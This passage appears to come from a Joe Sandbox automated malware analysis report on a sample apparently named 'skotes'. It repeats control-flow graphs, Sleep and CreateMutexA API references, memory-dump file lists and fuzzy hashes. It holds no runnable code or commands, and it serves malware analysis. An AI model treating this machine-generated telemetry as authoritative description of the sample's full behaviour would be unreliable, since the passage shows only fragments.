                                                                                                                                                                • Opcode Fuzzy Hash: 9bfdc29a3e983c518855a5fbde5c03a464b3a38ba7a438624ba96a393ac80eb1
                                                                                                                                                                • Instruction Fuzzy Hash: 69316A31A041049BFB08FB78DCC9BBDBBE2EB85314F24469AE0449B2E5C7759980C722

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 202 b8a682-b8a6a2 206 b8a6d0-b8a6ec 202->206 207 b8a6a4-b8a6b0 202->207 210 b8a71a-b8a739 206->210 211 b8a6ee-b8a6fa 206->211 208 b8a6b2-b8a6c0 207->208 209 b8a6c6-b8a6cd call b9d663 207->209 208->209 214 b8a949-b8a994 call bb6c6a * 2 Sleep CreateMutexA 208->214 209->206 212 b8a73b-b8a747 210->212 213 b8a767-b8a916 call b980c0 210->213 216 b8a6fc-b8a70a 211->216 217 b8a710-b8a717 call b9d663 211->217 218 b8a749-b8a757 212->218 219 b8a75d-b8a764 call b9d663 212->219 234 b8a996-b8a998 214->234 235 b8a9a7-b8a9a8 214->235 216->214 216->217 217->210 218->214 218->219 219->213 234->235 236 b8a99a-b8a9a5 234->236 236->235
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 213f1bbd5794fcb51a60e09bf126375b22a5985f7c78107a0cc180b609ba0528
                                                                                                                                                                • Instruction ID: a7877a615515387ce95f79df5d9e80f712523452bb963866391cae712134201f
                                                                                                                                                                • Opcode Fuzzy Hash: 213f1bbd5794fcb51a60e09bf126375b22a5985f7c78107a0cc180b609ba0528
                                                                                                                                                                • Instruction Fuzzy Hash: 65314A316041049BFB08FB78DCC97BEBBE2DB85310F24869AE054972E5D7759980C762

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 238 b89adc-b89ae8 239 b89aea-b89af8 238->239 240 b89afe-b89b27 call b9d663 238->240 239->240 241 b8a917 239->241 248 b89b29-b89b35 240->248 249 b89b55-b89b57 240->249 243 b8a953-b8a994 Sleep CreateMutexA 241->243 244 b8a917 call bb6c6a 241->244 252 b8a996-b8a998 243->252 253 b8a9a7-b8a9a8 243->253 244->243 254 b89b4b-b89b52 call b9d663 248->254 255 b89b37-b89b45 248->255 250 b89b59-b8a916 call b980c0 249->250 251 b89b65-b89d91 call b97a00 call b85c10 call b88b30 call b98220 call b97a00 call b85c10 call b88b30 call b98220 249->251 252->253 259 b8a99a-b8a9a5 252->259 254->249 255->241 255->254 259->253
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 17e8152fe9b8c809f29727778d0ccc0df4a4635da248bff5fdca0c957d5c84bd
                                                                                                                                                                • Instruction ID: 9c1e007faa5263c941063f88c51b310cdb79cb7cc2f5482f2a8192d6cd6bc2c5
                                                                                                                                                                • Opcode Fuzzy Hash: 17e8152fe9b8c809f29727778d0ccc0df4a4635da248bff5fdca0c957d5c84bd
                                                                                                                                                                • Instruction Fuzzy Hash: A2213A316042009BFF18BB68DCC977DB7E2EBC1310F2446AAE448872E1DB75A980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 315 b8a856-b8a86e 316 b8a89c-b8a89e 315->316 317 b8a870-b8a87c 315->317 320 b8a8a9-b8a8b1 call b87d30 316->320 321 b8a8a0-b8a8a7 316->321 318 b8a87e-b8a88c 317->318 319 b8a892-b8a899 call b9d663 317->319 318->319 322 b8a94e-b8a987 call bb6c6a Sleep CreateMutexA 318->322 319->316 331 b8a8b3-b8a8bb call b87d30 320->331 332 b8a8e4-b8a8e6 320->332 324 b8a8eb-b8a916 call b980c0 321->324 335 b8a98e-b8a994 322->335 331->332 339 b8a8bd-b8a8c5 call b87d30 331->339 332->324 337 b8a996-b8a998 335->337 338 b8a9a7-b8a9a8 335->338 337->338 341 b8a99a-b8a9a5 337->341 339->332 343 b8a8c7-b8a8cf call b87d30 339->343 341->338 343->332 347 b8a8d1-b8a8d9 call b87d30 343->347 347->332 350 b8a8db-b8a8e2 347->350 350->324
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213620092.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213649557.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213678014.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213705079.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213741370.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213758244.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213778827.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213842451.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213870900.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213897006.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213920919.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213946530.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213977085.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214002671.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2214026456.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_3_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 09d3fa3d81fe6af289c31234d9f2f0415c617b3953c76c2a78e9aa7a1876f5ba
                                                                                                                                                                • Instruction ID: 4381edd039196eb47adf01164579ad39a998adf2e2758ed732edbca63cca0632
                                                                                                                                                                • Opcode Fuzzy Hash: 09d3fa3d81fe6af289c31234d9f2f0415c617b3953c76c2a78e9aa7a1876f5ba
                                                                                                                                                                • Instruction Fuzzy Hash: 50212B716481019BFB2477A8989A77EB7D2DF81304F2408E7E148972F1DA759981C3A3

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 292 b8a34f-b8a35b 293 b8a35d-b8a36b 292->293 294 b8a371-b8a39a call b9d663 292->294 293->294 295 b8a93a 293->295 300 b8a3c8-b8a916 call b980c0 294->300 301 b8a39c-b8a3a8 294->301 297 b8a953-b8a994 Sleep CreateMutexA 295->297 298 b8a93a call bb6c6a 295->298 307 b8a996-b8a998 297->307 308 b8a9a7-b8a9a8 297->308 298->297 302 b8a3aa-b8a3b8 301->302 303 b8a3be-b8a3c5 call b9d663 301->303 302->295 302->303 303->300 307->308 311 b8a99a-b8a9a5 307->311 311->308
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000003.00000002.2212616596.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000003.00000002.2212595295.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212616596.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212698575.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212722785.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212748647.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212881177.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2212911404.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213010680.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213058348.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213081792.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213099332.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213119970.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213142325.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213164561.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213193073.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213214678.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213249882.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213269198.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213297921.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213322573.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213347437.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213369914.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213394298.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213420667.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213443978.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213467870.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213496984.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213519853.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213542967.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213565181.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000003.00000002.2213588695.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
